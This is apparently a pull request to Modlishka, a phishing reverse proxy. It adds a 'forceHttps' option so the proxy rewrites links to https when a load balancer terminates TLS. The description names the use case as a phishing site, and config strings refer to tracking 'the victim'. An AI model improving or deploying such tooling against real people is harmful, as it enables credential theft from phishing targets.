### PR TITLE
Force use HTTPS

### DIFF
--- a/config/config.go
+++ b/config/config.go
@@ -35,6 +35,7 @@ type Options struct {
 	TerminateRedirectUrl *string `json:"terminateRedirectUrl"`
 	TrackingCookie       *string `json:"trackingCookie"`
 	TrackingParam        *string `json:"trackingParam"`
+	ForceHttps           *bool   `json:"forceHttps"`
 	UseTls               *bool   `json:"useTls"`
 	Debug                *bool   `json:"debug"`
 	LogPostOnly          *bool   `json:"logPostOnly"`
@@ -71,6 +72,7 @@ var (
 		TrackingParam:  flag.String("trackingParam", "id", "Name of the HTTP parameter used to track the victim"),
 
 		UseTls:          flag.Bool("tls", false, "Enable TLS"),
+		ForceHttps:      flag.Bool("forceHttps", false, "Force convert links from http to https"),
 		Debug:           flag.Bool("debug", false, "Print debug information"),
 		DisableSecurity: flag.Bool("disableSecurity", false, "Disable security features like anti-SSRF. Disable at your own risk."),
 

--- a/core/proxy.go
+++ b/core/proxy.go
@@ -49,6 +49,7 @@ type ReverseProxy struct {
 	Config         *config.Options
 
 	IsTLS bool
+	ForceHttps bool
 }
 
 type Settings struct {
@@ -280,7 +281,7 @@ func (httpResponse *HTTPResponse) PatchHeaders(p *ReverseProxy) {
 			}
 		}
 
-		if p.IsTLS == true {
+		if (p.IsTLS == true || p.ForceHttps == true) {
 			newLocation = strings.Replace(newLocation, "http://", "https://", -1)
 		} else {
 			newLocation = strings.Replace(newLocation, "https://", "http://", -1)
@@ -425,7 +426,7 @@ func (p *ReverseProxy) InjectPayloads(buffer []byte) []byte {
 func (p *ReverseProxy) PatchURL(buffer []byte) []byte {
 
 	// Fix protocol
-	if p.IsTLS == false {
+	if (p.IsTLS == false && p.ForceHttps == false) {
 		buffer = bytes.Replace(buffer, []byte("https"), []byte("http"), -1)
 	}
 
@@ -461,6 +462,7 @@ func (s *Settings) NewReverseProxy() *ReverseProxy {
 		Proxy:          httputil.NewSingleHostReverseProxy(targetURL),
 		Config:         &s.Options,
 		IsTLS:          *s.UseTls,
+		ForceHttps:     *s.ForceHttps,
 		OriginalTarget: s.originaltarget,
 	}
 


### PR DESCRIPTION
I added new parameter: forceHttps (bool) 

Why:
It is just common to have certificate only on load balancer. Communication between loadbalancer and application is by http protocol.

It means phishing site is on TSL, but Modlishka thinking is on http protocol. By that parameter i can inform Modlishka to convert http to https links.

